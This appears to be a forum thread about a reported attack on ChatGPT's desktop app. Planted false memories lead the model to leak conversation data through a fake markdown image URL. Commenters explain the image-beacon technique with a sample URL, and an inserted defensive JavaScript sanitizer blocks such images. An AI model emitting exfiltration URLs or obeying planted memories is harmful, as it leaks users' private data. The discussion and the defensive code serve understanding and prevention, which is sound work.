tldr
- it affects the desktop app of ChatGPT, but likely any client that features long-term memory functionality.
- does not apply to the web interface.
- does not apply to API access.
- the data exfiltration is visible to the user as GPT streams the tokens that form the exfiltration URL as a (fake) markdown image.
false memories in ChatGPT
That’s … really bad.
How is the application able to send data to any website? Like even if you as the legit user explicitly asked it to do that?
Haven’t read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
Note: That is also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
This is why every single email client for the past 2+ decades blocks external images? This didn’t occur to the AI geniuses?
IME they usually proxy and/or prefetch images for caching instead of blocking them. Only spam content is blocked by default.
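The image-beacon mechanism described a few comments up (an image URL with data smuggled into its query string) and the email-client comparison just above, as an added example that is not code from this thread, from ChatGPT or from any real client: a render-time guard that treats every markdown image in model output the way a mail client treats external images. The allowlist host `images.example-chat.internal`, the function names and the sample model output are all constructed for the example.

```javascript
// Added example, not from the original thread. The model's output is
// untrusted text, so any ![alt](url) it emits is handled like an external
// image in an email client: blocked unless the host is explicitly
// allowlisted. Blocked images are replaced with a visible placeholder, and
// the caller gets a report of which query parameters would have left the
// device, which is what an exfiltration beacon carries.

const MARKDOWN_IMAGE = /!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)/g;

// Hosts the client is willing to fetch images from. Hypothetical value.
const DEFAULT_ALLOWED_HOSTS = new Set(['images.example-chat.internal']);

function classifyImageUrl(rawUrl, allowedHosts) {
  let parsed;
  try {
    parsed = new URL(rawUrl);
  } catch {
    // Relative or malformed URL: never fetch it.
    return { allowed: false, reason: 'unparseable', host: null, params: [] };
  }
  if (parsed.protocol !== 'https:') {
    return { allowed: false, reason: 'non-https', host: parsed.hostname, params: [] };
  }
  const params = [...parsed.searchParams.keys()];
  if (!allowedHosts.has(parsed.hostname)) {
    return { allowed: false, reason: 'host-not-allowlisted', host: parsed.hostname, params };
  }
  // Even an allowlisted host should not receive free-form query data: a
  // query string on an image URL is the classic channel for leaking text.
  if (params.length > 0) {
    return { allowed: false, reason: 'query-string-on-image', host: parsed.hostname, params };
  }
  return { allowed: true, reason: 'ok', host: parsed.hostname, params };
}

// Rewrites model output before it reaches the markdown renderer.
// Returns the safe markdown plus a list of blocked images for logging or UI.
function sanitizeMarkdownImages(markdown, allowedHosts = DEFAULT_ALLOWED_HOSTS) {
  const blocked = [];
  const rendered = markdown.replace(MARKDOWN_IMAGE, (match, alt, url) => {
    const verdict = classifyImageUrl(url, allowedHosts);
    if (verdict.allowed) return match;
    blocked.push({ url, ...verdict });
    return `[image blocked: ${verdict.reason}]`;
  });
  return { rendered, blocked };
}

// Constructed sample of model output: one legitimate image and one whose
// URL carries a query string, the pattern described in the thread.
const SAMPLE_OUTPUT = [
  'Here is the diagram you asked for:',
  '![diagram](https://images.example-chat.internal/diagram.png)',
  'Done. ![](https://site.example/badimage.gif?data=abcd)',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  const { rendered, blocked } = sanitizeMarkdownImages(SAMPLE_OUTPUT);
  console.log(rendered);
  console.log('blocked:', blocked);
}
```

One design point worth noting against the proxy-and-prefetch behaviour mentioned above: a proxy that fetches the image on the user's behalf still sends the full URL, query string included, to the remote host, so proxying hides the user's IP but does not stop the leak. Only refusing the fetch (allowlisting, or rejecting images with query strings) keeps the data on the device.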
I don’t understand. Why can’t ChatGPT be a good bot and keep a secret?